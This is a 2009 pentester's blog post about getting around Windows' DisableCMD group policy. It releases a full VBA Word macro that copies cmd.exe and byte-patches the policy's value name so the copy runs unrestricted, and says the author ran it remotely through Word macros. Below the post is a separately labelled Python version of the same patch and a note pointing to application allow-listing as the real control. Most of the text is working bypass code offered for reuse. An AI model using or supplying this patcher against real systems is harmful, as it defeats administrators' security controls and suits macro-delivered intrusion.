Tuesday, September 01, 2009

DisableCMD - History Repeating

Before I start: this is nothing new. It has been known for many years (e.g. http://blog.didierstevens.com/2007/11/28/quickpost-disableamd-disableregistryfools/).

During a pentest I needed to patch cmd.exe to ignore the DisableCMD policy setting. Nothing new, nothing special, but I needed to do it remotely and I had to use VBA/Word macros. Long story short, I decided to release the code, because it's nothing special and the technique is well known.

Here is a short video about it:

VBA Macro to remove DisableCMD CMD.EXE restriction from Max Moser on Vimeo.

Short video showing my VBA byte patcher, written to overcome the DisableCMD policy setting. Sorry, but I at least expected fail-safe behaviour.




I am not much of a VBA coder, but the macro might save someone some time. It copies cmd.exe to %temp%, searches for the UTF-16 string "DisableCMD" that cmd.exe uses as the registry value name, and overwrites the 'a' with '4' in the copy; the patched binary then looks up a value name the policy never sets and runs unrestricted. I will add an example.doc on remote-exploit.org as well.




Option Explicit

Sub patchcmd()
    ' Copies %WinDir%\system32\cmd.exe to %temp%\dmc.exe and renames the
    ' UTF-16LE string "DisableCMD" inside the copy to "Dis4bleCMD", so the
    ' patched copy queries a registry value name the DisableCMD policy never sets.
    Dim Sourcefile As String, Destfile As String, Windir As String, Tempdir As String
    Dim F1 As Integer, F2 As Integer
    Dim bytepattern(19) As Byte
    Dim WshShell As Object
    Dim fileoffset As Long      ' 1-based file position of the matched 'D'
    Dim patternoffset As Long   ' index of the next pattern byte we expect
    Dim tmpbyte As Byte
    Dim patchbyte As Byte       ' Put must write a Byte; a literal like &H34 is an Integer (2 bytes)

    Set WshShell = CreateObject("WScript.Shell")
    Windir = WshShell.ExpandEnvironmentStrings("%WinDir%")
    Tempdir = WshShell.ExpandEnvironmentStrings("%temp%")

    ' "DisableCMD" as cmd.exe stores it: UTF-16LE, NUL-terminated
    bytepattern(0) = &H44: bytepattern(1) = &H0    'D
    bytepattern(2) = &H69: bytepattern(3) = &H0    'i
    bytepattern(4) = &H73: bytepattern(5) = &H0    's
    bytepattern(6) = &H61: bytepattern(7) = &H0    'a
    bytepattern(8) = &H62: bytepattern(9) = &H0    'b
    bytepattern(10) = &H6C: bytepattern(11) = &H0  'l
    bytepattern(12) = &H65: bytepattern(13) = &H0  'e
    bytepattern(14) = &H43: bytepattern(15) = &H0  'C
    bytepattern(16) = &H4D: bytepattern(17) = &H0  'M
    bytepattern(18) = &H44: bytepattern(19) = &H0  'D, then the terminator

    Sourcefile = Windir & "\system32\cmd.exe"
    Destfile = Tempdir & "\dmc.exe"

    If Dir(Sourcefile) = "" Then Exit Sub
    FileCopy Sourcefile, Destfile

    F1 = FreeFile
    Open Sourcefile For Binary Access Read As #F1
    F2 = FreeFile
    Open Destfile For Binary As #F2

    fileoffset = 0
    patternoffset = 0
    patchbyte = &H34            ' '4'

    Do While Not EOF(F1)
        Get #F1, , tmpbyte
        If tmpbyte = bytepattern(patternoffset) Then
            ' Seek(F1) is the position of the next byte, so Seek - 1 is this one
            If patternoffset = 0 Then fileoffset = Seek(F1) - 1
            patternoffset = patternoffset + 1
            If patternoffset > UBound(bytepattern) Then
                ' Whole string matched. The 'a' is the 7th byte (D 0 i 0 s 0 a),
                ' i.e. fileoffset + 6; overwrite it in the copy -> "Dis4bleCMD"
                Put #F2, fileoffset + 6, patchbyte
                Close #F1
                Close #F2
                MsgBox "Yeah, run it from: " & Destfile, vbOKOnly, "CMD.EXE patched"
                Exit Sub
            End If
        ElseIf tmpbyte = bytepattern(0) Then
            ' Mismatch, but this byte may itself start the string (a 'D' right
            ' before "DisableCMD" was dropped by the original matcher)
            fileoffset = Seek(F1) - 1
            patternoffset = 1
        Else
            patternoffset = 0
        End If
    Loop

    Close #F1
    Close #F2
    MsgBox "DisableCMD string not found; " & Destfile & " is an unpatched copy", vbOKOnly, "CMD.EXE not patched"
End Sub
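The same patch in Python, as an added example that is not the post's macro: it searches for the NUL-terminated UTF-16LE string that the macro's byte pattern encodes, refuses to proceed unless the string occurs exactly once, and writes the patched bytes to a copy. The stand-in binary is constructed inline (it is not a real cmd.exe), and the assumption that cmd.exe stores the value name exactly this way is the same one the macro makes.

```python
"""Byte-patch the UTF-16LE value name "DisableCMD" in a copy of cmd.exe.

Added example, not the original post's VBA. It assumes (as the post's byte
pattern does) that cmd.exe stores the policy value name as a NUL-terminated
UTF-16LE string. SAMPLE_BINARY below is constructed, not a real cmd.exe.
"""
import sys
from pathlib import Path

NEEDLE = "DisableCMD".encode("utf-16-le") + b"\x00\x00"   # terminator included
PATCHED = "Dis4bleCMD".encode("utf-16-le") + b"\x00\x00"  # same length, never a real value name


def patch_disablecmd(data: bytes) -> bytes:
    """Return data with the single DisableCMD string renamed to Dis4bleCMD.

    Raises ValueError if the string is absent or occurs more than once, so an
    unexpected cmd.exe layout fails loudly instead of being half-patched.
    """
    first = data.find(NEEDLE)
    if first < 0:
        raise ValueError("DisableCMD string not found")
    if data.find(NEEDLE, first + 1) >= 0:
        raise ValueError("DisableCMD string found more than once")
    return data[:first] + PATCHED + data[first + len(NEEDLE):]


def patch_file(src: Path, dst: Path) -> int:
    """Copy src to dst with the patch applied; return the 0-based offset patched."""
    data = src.read_bytes()
    dst.write_bytes(patch_disablecmd(data))
    return data.find(NEEDLE)


# Constructed stand-in for cmd.exe: a few header-like bytes, a decoy that shares
# the first byte (0x44 'D') with the target, the real NUL-terminated value name,
# and an unrelated policy name that must survive the patch untouched.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 8
    + "DD".encode("utf-16-le")                                   # decoy prefix
    + "DisableCMD".encode("utf-16-le") + b"\x00\x00"             # the target
    + "DisableRegistryTools".encode("utf-16-le") + b"\x00\x00"   # must remain
)

if __name__ == "__main__":
    if len(sys.argv) == 3:
        print("patched at offset", patch_file(Path(sys.argv[1]), Path(sys.argv[2])))
    else:
        out = patch_disablecmd(SAMPLE_BINARY)
        print("sample: target at", SAMPLE_BINARY.find(NEEDLE), "patched:", PATCHED in out)
```

Run it with a source and a destination path to patch a real file, or with no arguments to exercise the constructed sample; the decoy 'D' in front of the target is the case the original macro's restart logic mishandled. The practitioner's caveat: DisableCMD is enforced by cmd.exe itself, so any copy the user can write and execute defeats it, and the real control is application allow-listing (AppLocker or Software Restriction Policies), not the policy value.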